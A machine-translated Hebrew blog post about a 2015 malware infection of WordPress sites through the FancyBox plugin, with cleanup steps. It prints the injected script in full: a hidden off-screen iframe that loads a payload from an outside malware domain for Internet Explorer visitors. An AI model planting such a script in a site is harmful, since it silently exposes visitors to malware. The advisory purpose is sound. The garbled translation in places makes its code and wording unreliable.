בתחילת השבוע סדרת אתרים ובלוגים עם וורדפרס, קיבלו אזהרות של זיהום בתוכנות זדוניות בְּאֶמצָעוּת מנהלי אתרים של גוגלו
הבעיה בה מנהלי אתרים של גוגל מתייחס אליו הוא נוכחות של א בַּקָלָה / / תַסרִיט iframe תוכנה זדונית במקור דפי האינטרנט.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>נראה שזה פְּגִיעוּת א תוסףרכישהFancybox עבור וורדפרס שעד אתמול (05.02.2015) לא עודכן במשך זמן רב.
פתרון בעיה זו ו חיטוי אתרי וירוסים בעזרת תוכנה זדונית זו, זה יחסית פשוט.
1. השבת את פלאן פנסיבוקס.
2. מחק את כל קבצי התוספים של FancyBox בשרת (באמצעות FTP)
3. התקן את הגרסה החדשה של התוסף (Fancybox 3.0.4)
Fancybox עבור WordPress 3.0.4
– שמה שונה לתפאורה שנפגעה מבעיה האבטחה המוזכרת ב- 3.0.3. זה אמור למנוע את ההופעה של הקוד זדוני באתרים שבהם מתעדכן התוסף מבלי להסיר את הקוד הזדוני.
Fancybox עבור WordPress 3.0.3
– תיקן סוגיית אבטחהו
מידע על תוכנות זדוניות:
סוג: ניתוב מחדש של iframe
יעד: WordPress Fancybox
תחום תוכנה זדונית: 203Koko.eu
תוכנה זדונית URI: http://203koko.eu/hjnfh/ipframe2.php
קוד גולמי של תוכנות זדוניות: <iframe src =”http://203koko.eu/hjnfh/ipframe2.php” רוחב =”20″ גובה =”30″ ></iframe>
סקריפט תוכנה זדונית: <תַסרִיט>if (navigator.useragent.match (/msie/i)) {document.write (‘ <סגנון DIV =”מיקום: מוחלט; משמאל: -2000 פיקסלים; רוחב: 2000 פיקסלים”>
הסר תוכנה זדונית מאתר וורדפרס שלךו
